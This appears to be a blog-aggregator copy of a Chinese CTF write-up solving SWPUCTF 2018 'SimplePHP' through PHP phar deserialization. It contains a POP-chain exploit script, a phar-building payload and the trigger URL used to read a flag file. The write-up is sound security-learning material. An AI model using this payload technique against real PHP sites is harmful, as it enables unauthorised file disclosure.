M4xlmum
M4xlmum

【SWPUCT 2018】SimplePHP

tags: [phar反序列化, ctf, web]

拿下代码

先通过查看文件的功能拿下全部的文件代码,分别是index.phpbase.phpfile.phpupload_file.phpfunction.phpclass.php。然后粗略看下代码,有个提示(不知道是不是后面放上去的),就是class.php那里。


class C1e4r
{
     
    public $test;
    public $str;
    public function __construct($name)
    {
     
        $this->str = $name;
    }
    public function __destruct()
    {
     
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
     
    public $source;
    public $str;
    public function __construct($file)
    {
     
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }

    public function __toString()
    {
     
        $content = $this->str['str']->source;
        return $content;
    }

    public function __set($key,$value)
    {
     
        $this->$key = $value;
    }
    public function _show()
    {
     
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
     
            die('hacker!');
        } else {
     
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
     
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
     
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
     
    public $file;
    public $params;
    public function __construct()
    {
     
        $this->params = array();
    }

    public function __get($key)
    {
     
        return $this->get($key);
    }

    public function get($key)
    {
     
        if(isset($this->params[$key])) {
     
            $value = $this->params[$key];
        } else {
     
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
     
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

审计与pop链的构造

首先是C1e4r类的__destruct()方法,可以把$test也就是$str给输出出来。想要输出flag就得将$str的内容为flag文件,将$str声明为$show对象可以触发show类中的__toString()方法。

然后是show类的__toString()方法,可以把$content的内容返回对象,这就要求$show->str['str']->source的内容为flag文件,若$show->str['str']为test类的一个实例化对象,则因test类里面没有source属性,从而触发__get()方法。

最后就是test类了,利用__get()get()file_get($value)到最后返回出来, v a l u e 的 值 为 ‘ value的值为` valuethis->params[$key]`,

下为pop链函数


class C1e4r
{
     
    public $test;
    public $str;
}

class Show
{
     
    public $source;
    public $str;
}
class Test
{
     
    public $file;
    public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();

$test->params['source'] = "/var/www/html/f1ag.php";  //目标文件
$c1e4r->str = $show;   //触发__toString(),利用 `$this->test = $this->str; echo $this->test;`
$show->str['str'] = $test;  //触发__get(),利用 `$this->str['str']->source`;

第一个__tostring()的触发是因为对象被当做字符串了,第二个__get()方法触发是因为test类里面没有source属性。

phar文件制作及利用

phar文件制作脚本:


class C1e4r
{
     
    public $test;
    public $str;
}

class Show
{
     
    public $source;
    public $str;
}
class Test
{
     
    public $file;
    public $params;

}

$c1e4r = new C1e4r();
$show = new Show();
$test = new Test();

$test->params['source'] = "/var/www/html/f1ag.php";  //目标文件
$c1e4r->str = $show;   //触发__toString(),利用 `$this->test = $this->str; echo $this->test;`
$show->str['str'] = $test;  //触发__get(),利用 `$this->str['str']->source`;


$phar = new Phar("7.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('');
$phar->setMetadata($c1e4r); //触发头是C1e4r类
$phar->addFromString("test.txt", "test"); //生成签名
$phar->stopBuffering();

本地访问一下生成文件后改下后缀名为.png,上传。上传之后可以在upload目录下发现刚上传的图片,在function.php的源码里面可以发现下面的这条语句

if(file_exists("upload/" . $filename)) {
      
        unlink($filename); 
    }

从而得知文件的目录。。。阿巴阿巴,目录直接就开着呢,就比较好找。

触发phar://获得flag

访问格式如下

http://b96da071-0c04-4abe-96c6-ea5cf235782d.node3.buuoj.cn/file.php?file=phar://upload/2fe9104ed353a3e60ed55404e1abf179.jpg

【SWPUCT 2018】SimplePHP_第1张图片

获得base64转化后的内容解码一下即为flag。

  __HALT_COMPILER(); ?>
PD9waHAgDQoJLy8kYSA9ICdmbGFnezBlNjg3NzQzLWM5NWQtNDJhMi04Nzk5LWM0MzIwNjU1MjBjMH0nOw0KID8+DQoNCg==

你可能感兴趣的:(CTF,php,web,phar反序列化)

  • Java web 富文本内容生成转为word格式并导出下载 摘星喵Pro javaweb编程技巧java前端servlet
    Javaweb富文本内容生成转为word格式并导出下载最近思路,按标签逐一解析,实现复杂一点但是完美解决问题:https://blog.csdn.net/a2272062968/article/details/126227076思路:Word是完全支持html标签的,但是富文本内容并不是完整的html代码,需要先补全html标签,然后转码输出问题:虽然导出worddoc但是事件内容流还是htm,只
  • HTML+CSS初学 (day3) 灵封~ html前端css
    HTML,全称为超文本标记语言(HyperTextMarkupLanguage),是一种用于创建网页的标准标记语言。HTML是构建Web页面的基础,它使用一系列称为标签的关键字来定义页面的结构。一、HTML的基本概念定义:HTML通过标签来描述网页中的各个元素,如标题、段落、图片、链接等。这些标签告诉浏览器如何显示内容,包括文字、图片、视频等。作用:定义网页的结构和内容,使网页内容能够按照预定的格
  • 编程式路由导航的三种方法 小野晨曦 前端javascript开发语言
    什么是编程式路由导航?编程式路由导航其实就是脱离实现路由跳转。//创建一个路由器,并暴露出去//第一步:引入createRouterimport{createRouter,createWebHistory,createWebHashHistory}from'vue-router';//引入一个一个可能要呈现的组件importHomefrom'@/pages/Home.vue'importNewsf
  • VUE之路由Props、replace、编程式路由导航、重定向 三日沐水 vuevue.js智能路由器前端
    目录1、路由_props的配置2、路由_replaces属性3、编程式路由导航4、路由重定向1、路由_props的配置1)第一种写法,将路由收到的所有params参数作为props传给路由组件只能适用于params参数//创建一个路由器,并暴露出去//第一步:引入createRouterimport{createRouter,createWebHistory,createWebHashHistor
  • 练习题 - Django 4.x File 文件上传使用示例和配置方法 Mr数据杨 PythonWeb开发djangosqlite数据库
    在现代的web应用开发中,文件上传是一个常见的功能,无论是用户上传头像、上传文档,还是其他类型的文件,处理文件上传都是开发者必须掌握的技能之一。Django作为一个流行的Pythonweb框架,提供了便捷的文件上传功能和配置方法。学习如何在Django中实现文件上传,不仅有助于提升编程技能,还能帮助我们更好地理解web应用的开发流程。本次练习题的设计目的是通过真实的生活实例帮助自学编程的用户掌握D
  • 一文大白话讲清楚webpack进阶——1——SourceMap 16年上任的CTO webpackwebpack前端node.jssourcemap
    文章目录一文大白话讲清楚webpack进阶——1——SourceMap1.啥是SourceMap2.SourceMap的结构3.SourceMap触发时机4.SourceMap怎么配置4.1devtool配置4.1.1devtool属性4.1.1.1eval4.1.1.2source-map4.1.1.3cheap4.1.1.4module4.1.1.5nosources4.1.1.6hidden
  • 一文大白话讲清楚webpack进阶——3——Loader的执行顺序(pre,normal,inline,post) 16年上任的CTO webpackwebpack前端node.jsloader执行顺序
    文章目录一文大白话讲清楚webpack进阶——3——Loader的执行顺序(pre,normal,inline,post)1.loader的分类和执行顺序1.1pre1.2normal1.3inline1.4post1.5相同优先级2.如何制定分类2.1非inline2.2inline2.2.1禁用普通loader2.2.2禁用所有loader2.2.3禁用非post类型loader一文大白话讲清
  • Thymeleaf基础知识语法 沐暖沐 thymeleaf开发语言
    1、简介Thymeleaf是⾯向Web和独⽴环境的现代服务器端Java模板引擎,能够处理HTML、XML、JavaScript、CSS、TEXT、RAW这六种模板。这六种模版模式包含两种标记模板模式(HTML和XML),三种⽂本模板模式(TEXT,JAVASCRIPT和CSS)和⼀个⽆操作模板模式(RAW)。①简单表达式变量表达式:${…}选择变量表达式:*{…}消息表达:#{…}链接URL表达式
  • python 基本知识 达达玲玲 python开发语言
    Python:背景知识及环境安装什么是Python?Python是一种解释型、面向对象的高级编程语言。它的设计哲学强调代码的可读性和简洁性,因此被广泛应用于各种领域,包括:数据科学与机器学习:NumPy,Pandas,Matplotlib,Scikit-learn等库让Python成为了数据分析和机器学习的首选语言。Web开发:Django,Flask等框架提供了高效的Web开发解决方案。自动化:
  • 一文大白话讲清楚webpack基本使用——18——HappyPack 16年上任的CTO webpackwebpack前端node.jshappypack
    文章目录一文大白话讲清楚webpack基本使用——18——HappyPack1.建议按文章顺序从头看,一看到底,豁然开朗2.啥是HappyPack3.怎么使用HappyPack一文大白话讲清楚webpack基本使用——18——HappyPack1.建议按文章顺序从头看,一看到底,豁然开朗第一篇:一文大白话讲清楚啥是个webpack第二篇:一文大白话讲清楚webpack基本使用——1——完成webp
  • php tofixed,js修复toFixed()四舍五入精度问题,并相对于原生提高了性能 weixin_39590868 phptofixed
    思路是将小数分割成整数和小数部分然后进行四舍五入再补全字符串后的0目前没发现有什么问题。有bug请反馈谢谢代码原创,转载请注明连接谢谢"usestrict";/***https://my.oschina.net/isgaoyi/blog/4717508-v1.0(2020-11-15T01:46:32+0800)*[email protected]**修复四舍五入精度问题*@me
  • goGin框架教程 sumatch gogolang
    1.gin框架入门1.1介绍Gin是一个用Golang编写的高性能的web框架,由于http路由的优化,速度提高了近40倍。Gin的特点就是封装优雅、API友好。Gin的一些特性:快速基于Radix树的路由,小内存占用。没有反射。可预测的API性能。支持中间件传入的HTTP请求可以由一系列中间件和最终操作来处理。例如:Logger,Authorization,GZIP,最终操作DB。Crash处理
  • web自动化——前端知识 大哥喝阔落 前端自动化运维
    是HTML中的一个元素,用于在当前网页中嵌入另一个网页或文档。它就像一个“窗口”,可以在页面中显示其他内容。主要特点:嵌入外部内容:可以在网页中嵌入其他网页、视频、地图等。独立上下文:嵌入的内容与主页面相互独立,拥有自己的JavaScript和CSS环境。可定制:可以通过属性调整大小、边框等。常用属性:src:指定要嵌入内容的URL。width和height:设置iframe的宽度和高度。fram
  • struts2详解 dyy_gusi webMVCstruts
    1.搭建struts2运行环境:1.1找到所需要的jar包struts2-core-xwork-core-ognl-freemarker-commons-logging-commons-fileupload-1.2编写struts2的配置文件*.jsp1.3在web.xml中加入struts2的启动配置struts2org.apache.struts2.dispatcher.ng.filter.S
  • Spring Boot项目中使用MockMvc进行测试的详细指南 一休哥助手 javaspringboot后端java
    目录MockMvc简介安装和配置基本用法高级用法集成测试测试最佳实践总结MockMvc简介MockMvc是Spring框架提供的一种用于测试SpringMVC控制器的工具。它允许开发者在不启动完整的Web服务器的情况下,模拟HTTP请求并验证响应。MockMvc的主要优点包括:快速执行:
  • 《spring编程常见错误50例》学习笔记 Day1 qq_31273845 学习spring
    1.为什么有时候我们代码移了一下包,就扫描不到了?在构建web服务的时候,我们启动服务程度如果不设置扫描包的话,默认会扫描运行程序所在的包。如果包和应用程序不在同一个包,就会失效。这个之前知道,至于为什么?今天才了解到,我就这里复述一下:@SpringBootApplication里面会有@ComponentScan注解。参考配置如下@ComponentScan(excludeFilters={@
  • 构建大规模分布式服务--高并发、高可用架构系列,高质量原创好文 90后小伙追梦之路 后端架构javajava程序人生分布式开发语言面试
    当我们在谈论“服务治理”的时候,都在谈论些什么?我从业之初接触到的便是一堆基于Webservice、Hessain等实现的跨语言的分布式系统,那是SOA架构和理念十分盛行的时代,我常常听到前辈们在谈论“SOA治理”等高大上的词,但我当时并没有理解何为“治理”,甚至在想:为什么不叫“管理”呢?在此之前,我仅在小学课本上接触过“污水治理”这个词。直到近些年互联网企业大规模服务化进程的推进,以Dubbo
  • 【jQuery】jQuery 处理 Ajax 以及解决跨域问题的方式 一二¬ 前端jqueryjavascript前端
    文章目录HTTP原生创建AjaxjQuery处理Ajax$.ajax()$().load()$.get()$.post()跨域CORSJSONPiframewebsocketsHTTP超文本传输协议(HTTP,HyperTextTransferProtocol)是互联网上应用最为广泛的一种网络协议。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。一次HTTP操作称为一个事务,其工
  • 【Java Web】JSON 以及 JSON 转换 一二¬ #JavaWebjavajson
    JSON(JavaScriptObjectNotation)一种灵活、高效、轻量级的数据交换格式,广泛应用于各种数据交换和存储场景。基本特点1、简单易用:JSON格式非常简单,易于理解和使用。2、轻量级:相比XML等其他数据格式,JSON占用的空间更小,传输效率更高。3、跨平台:JSON是一种纯文本格式,可以轻松地在不同的系统和编程语言之间交换数据。4、可读性强:JSON格式的数据结构清晰,易于阅
  • chatgpt赋能python:Python如何删除一个对象 atest166 ChatGptchatgptjvmjava计算机
    Python如何删除一个对象Python是一种高级、面向对象、动态类型解释型语言,它有广泛的应用,尤其在数据分析、机器学习、人工智能和Web开发等领域。但是,在Python编程过程中,我们也可能需要删除对象。那么,Python如何删除一个对象呢?Python对象和变量在Python中,一切都是对象。对象是内存中的一块数据,有自己的身份、类型和值。变量是指向对象的引用,通过变量可以访问对象的属性和方
  • 【面试题】构建高并发、高可用服务架构:技术选型与设计 言之。 redispython面试架构
    监控系统消息队列缓存层数据存储层应用层Web层负载均衡与流量分配GrafanaPrometheusAlertmanager消息队列Kafka/RabbitMQ集群/镜像队列缓存层Redis/Memcached数据库MySQL/PostgreSQL主从复制/主主复制应用服务器SpringBoot/Node.js应用服务器SpringBoot/Node.js应用服务器SpringBoot/Node.j
  • 2025年React前端路线图:从初级到高级
    2025年React前端路线图:从初级到高级原文链接:2025ReactFrontendRoadmap:BeginnertoSeniorLevel作者:tak089译者:倔强青铜三前言大家好,我是倔强青铜三。是一名热情的软件工程师,我热衷于分享和传播IT技术,致力于通过我的知识和技能推动技术交流与创新,欢迎关注我,微信公众号:倔强青铜三。欢迎点赞、收藏、关注,一键三连!!!1.初级(入门级)目标:
  • REST风格(SPRINGBOOT框架) 一只藏羚吖 SPRINGBOOT框架javaspringboot
    目录一、核心概念二、主要特点三、优点四、缺点五、应用实例1.添加SpringBootStarterWeb依赖2.创建RESTful控制器3.配置和测试4.部署和运行REST(RepresentationalStateTransfer)风格是一种针对网络应用设计和开发的架构风格,它强调资源的表示、无状态通信以及统一接口,它定义了一种在网络上创建、读取、更新和删除资源(通常指数据)的方式。以下从多个方
  • 探索 Meissonic:文本到图像生成的新星 zhangjiaofa 大模型文生图大模型Meissonic
    目录前言模型概述主要功能技术架构应用场景在线体验本地部署克隆存储库创建虚拟环境安装扩散器启动GradioWeb用户界面文本到图像生成结语项目地址一、前言在人工智能迅猛发展的今天,文本到图像生成技术已成为科技前沿的热点。从艺术创作到商业设计,从学术研究到工业应用,这一技术正以惊人的速度改变着我们与数字内容的交互方式。众多研究机构和企业纷纷投入这一领域,不断推动技术的边界。然而,尽管已有许多优秀的模型
  • JVM垃圾回收器的原理和调优详解! 喵手 零基础学Javajvm
    全文目录:开篇语前言摘要概述垃圾回收器分类及原理1.Serial垃圾回收器2.Parallel垃圾回收器3.CMS垃圾回收器4.G1垃圾回收器源码解析示例代码使用案例分享案例1:Web服务的GC调优案例2:大数据任务的GC优化应用场景案例垃圾回收调优策略优缺点分析优点缺点核心类方法介绍测试用例小结总结文末开篇语哈喽,各位小伙伴们,你们好呀,我是喵手。运营社区:C站/掘金/腾讯云/阿里云/华为云/5
  • Go语言web快速开发框架Gin如何进行数据的增删查改呢? 网友阿贵 Go语言golanggin后端intellij-ideavscode
    在Go语言中使用Gin框架进行Web开发时,你可以轻松地结合database/sql接口和具体的数据库驱动(如MySQL的go-sql-driver/mysql)来执行数据的增删查改(CRUD)操作。下面通过几个简单的例子展示如何使用Gin和MySQL进行基本的数据操作。1.安装依赖确保你已经安装了必要的依赖:goget-ugithub.com/gin-gonic/gingoget-ugithub
  • 深度学习之基于Django+YOLOv5商标识别 Q1744828575 pythonplotlypython
    欢迎大家点赞、收藏、关注、评论啦,由于篇幅有限,只展示了部分核心代码。文章目录一项目简介二、功能三、系统四.总结一项目简介  一、项目背景在数字化时代,商标作为企业的重要资产,其保护和管理显得尤为重要。然而,传统的商标识别方法往往依赖于人工审查,效率低下且容易出错。随着深度学习技术的不断发展,尤其是目标检测领域的进步,自动化、高精度的商标识别成为可能。本项目旨在利用DjangoWeb框架和YOLO
  • WebSocket 详解:全双工通信的实现与应用 Future_yzx websocket网络协议网络
    目录一、什么是WebSocket?(简介)二、为什么需要WebSocket?三、HTTP与WebSocket的区别WebSocket的劣势WebSocket的常见应用场景WebSocket握手过程WebSocket事件处理和生命周期一、什么是WebSocket?(简介)WebSocket是一种在单个TCP连接上进行全双工通信的协议。它使得客户端和服务器之间的数据交换变得更加简单,允许服务器主动向客
  • WebSocket 心跳机制:确保连接稳定与实时性 Future_yzx websocket网络协议网络
    目录前言什么是WebSocket心跳机制?WebSocket心跳机制的实现关键代码如下:WebSocket心跳机制的应用场景WebSocket心跳机制的优势WebSocket心跳机制的注意事项前言WebSocket是一种基于持久连接的协议,它支持全双工通信,能够在客户端和服务器之间保持长期的实时连接。然而,长时间不活动的连接可能会被防火墙、代理服务器或其他网络设备误判为非活跃连接,从而断开。为了确
  • 使用.NET 8构建高效的时间日期帮助类 黄同学real C#后端开发.net.netc#后端
    使用.NET8构建高效的时间日期帮助类在现代Web应用程序中,处理日期和时间是一个常见的需求。无论是记录日志、生成报告还是进行数据分析,正确处理日期和时间对于确保数据的准确性和一致性至关重要。本文将详细介绍如何使用ASP.NETCore和C#构建一个高效的时间日期帮助类,并展示其使用方法。技术栈.NET8:提供强大的API开发框架。C#:用于编写高效的业务逻辑。代码实现DateTimeHelper
  • JAVA中的Enum 周凡杨 javaenum枚举
    Enum是计算机编程语言中的一种数据类型---枚举类型。 在实际问题中,有些变量的取值被限定在一个有限的范围内。     例如,一个星期内只有七天 我们通常这样实现上面的定义: public String monday; public String tuesday; public String wensday; public String thursday
  • 赶集网mysql开发36条军规 Bill_chen mysql业务架构设计mysql调优mysql性能优化
    (一)核心军规 (1)不在数据库做运算    cpu计算务必移至业务层; (2)控制单表数据量    int型不超过1000w,含char则不超过500w;    合理分表;    限制单库表数量在300以内; (3)控制列数量    字段少而精,字段数建议在20以内
  • Shell test命令 daizj shell字符串test数字文件比较
    Shell test命令 Shell中的 test 命令用于检查某个条件是否成立,它可以进行数值、字符和文件三个方面的测试。 数值测试 参数 说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真 实例演示: num1=100 num2=100if test $[num1]
  • XFire框架实现WebService(二) 周凡杨 javawebservice
       有了XFire框架实现WebService(一),就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程): 两个java bean类: Course.java    package cn.com.bean; public class Course {     private
  • 重绘之画图板 朱辉辉33 画图板
           上次博客讲的五子棋重绘比较简单,因为只要在重写系统重绘方法paint()时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。        画图板重绘难在需要重绘的类型很多,比如说里面有矩形,园,直线之类的,所以我们要想办法将里面的图形加入一个队列中,这样在重绘时就
  • Java的IO流 西蜀石兰 java
    刚学Java的IO流时,被各种inputStream流弄的很迷糊,看老罗视频时说想象成插在文件上的一根管道,当初听时觉得自己很明白,可到自己用时,有不知道怎么代码了。。。 每当遇到这种问题时,我习惯性的从头开始理逻辑,会问自己一些很简单的问题,把这些简单的问题想明白了,再看代码时才不会迷糊。 IO流作用是什么? 答:实现对文件的读写,这里的文件是广义的; Java如何实现程序到文件
  • No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
    java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match!   网上找了好多的资料没能解决,后来发现:项目中使用的是xml配置的方式配置事务,但是
  • Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
    原文:http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large   异常信息: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
  • JS 格式化时间 alxw4616 JavaScript
    /** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
  • 队列中数据的移除问题 百合不是茶 队列移除
         队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除,  代码如下;      // package com.Thread0715.com; import java.util.ArrayList; public class Threa
  • Runnable接口使用实例 bijian1013 javathreadRunnablejava多线程
    Runnable接口 a.       该接口只有一个方法:public void run(); b.       实现该接口的类必须覆盖该run方法 c.       实现了Runnable接口的类并不具有任何天
  • oracle里的extend详解 bijian1013 oracle数据库extend
    扩展已知的数组空间,例: DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素,大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
  • 【httpclient】httpclient发送表单POST请求 bit1129 httpclient
    浏览器Form Post请求 浏览器可以通过提交表单的方式向服务器发起POST请求,这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求,将请求数据放置于请求体中,服务器端以二进制流的方式读取数据,HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求,比如请求数据是字符串或者是二进制数据 2. Form
  • 【Hive十三】Hive读写Avro格式的数据 bit1129 hive
     1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype      2. 创建avro格式的数据表   hive> CREATE TABLE avro_table(age INT, name STRING)STORE
  • nginx+lua+redis自动识别封解禁频繁访问IP ronin47
    在站点遇到攻击且无明显攻击特征,造成站点访问慢,nginx不断返回502等错误时,可利用nginx+lua+redis实现在指定的时间段 内,若单IP的请求量达到指定的数量后对该IP进行封禁,nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在 指定的封禁时间后实行自动解封的目的。 一、安装环境: CentOS x64 release 6.4(Fin
  • java-二叉树的遍历-先序、中序、后序(递归和非递归)、层次遍历 bylijinnan java
    import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
  • Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan javaspringIOC
    以FileSystemXmlApplicationContext为例,把Spring IoC容器的初始化流程走一遍: ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
  • [科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
         军事科研工程和项目 并非要用最先进,最时髦的技术,而是要做到“万无一失”    而民营科技企业在搞科技创新工程的时候,往往考虑的是技术的先进性,而对先进技术带来的风险考虑得不够,在今天提倡军民融合发展的大环境下,这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前,对
  • spring 定时器-两种方式 cuityang springquartz定时器
    方式一: 间隔一定时间 运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
  • 简述一下关于BroadView站点的相关设计 damoqiongqiu view
    终于弄上线了,累趴,戳这里http://www.broadview.com.cn   简述一下相关的技术点   前端:jQuery+BootStrap3.2+HandleBars,全站Ajax(貌似对SEO的影响很大啊!怎么破?),用Grunt对全部JS做了压缩处理,对部分JS和CSS做了合并(模块间存在很多依赖,全部合并比较繁琐,待完善)。   后端:U
  • 运维 PHP问题汇总 dcj3sjt126com windows2003
    1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页 解决方法: 后台>系统>系统基本参数>核心设置>关键字替换(是/否),这里选择“是”。 后台>系统>系统基本参数>其他选项>自动提取关键字,这里选择“是”。   2、解决PHP168超级管理员上传图片提示你的空间不足 网站是用PHP168做的,反映使用管理员在后台无法
  • mac 下 安装php扩展 - mcrypt dcj3sjt126com PHP
    MCrypt是一个功能强大的加密算法扩展库,它包括有22种算法,phpMyAdmin依赖这个PHP扩展,具体如下: 下载并解压libmcrypt-2.5.8.tar.gz。 在终端执行如下命令: tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
  • MongoDB更新文档 [四] eksliang mongodbMongodb更新文档
    MongoDB更新文档 转载请出自出处:http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD,前面的博客简单介绍了,但是对文档更新篇幅比较大,所以这里单独拿出来。 语法结构如下: db.collection.update( criteria, objNew, upsert, multi) 参数含义 参数   
  • Linux下的解压,移除,复制,查看tomcat命令 y806839048 tomcat
    重复myeclipse生成webservice有问题删除以前的,干净 1、先切换到:cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。 有问题不明的先注掉   cp /opt/tomcat-6.0.44/webapps/g
  • Spring之使用事务缘由(3-XML实现) ihuning spring
      用事务通知声明式地管理事务   事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理,可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知,为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后,就需要将它与切入点关联起来。由于事务通知是在 <aop:
  • GCD使用经验与技巧浅谈 啸笑天 GC
    前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”,本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量 这一条算是“老生常谈”了,但我认为还是有必要强调一次,毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug,正确的如下: 1
  • linux(Ubuntu)下常用命令备忘录1 macroli linux工作ubuntu
    在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表:ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容,但这样直接运行所得到的信息也是比较少的,通常它可以结合以下这些参数运行以查询更多的信息:  ls / 显示/.下的所有文件和目录  ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件,包括隐藏文
  • nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点mysqlnodejs
    // db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
  • 一起学Hive系列文章 superlxw1234 hiveHive入门
      [一起学Hive]系列文章 目录贴,入门Hive,持续更新中。   [一起学Hive]之一—Hive概述,Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
  • Spring开发利器:Spring Tool Suite 3.7.0 发布 wiselyman spring
    Spring Tool Suite(简称STS)是基于Eclipse,专门针对Spring开发者提供大量的便捷功能的优秀开发工具。   在3.7.0版本主要做了如下的更新:   将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者,推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他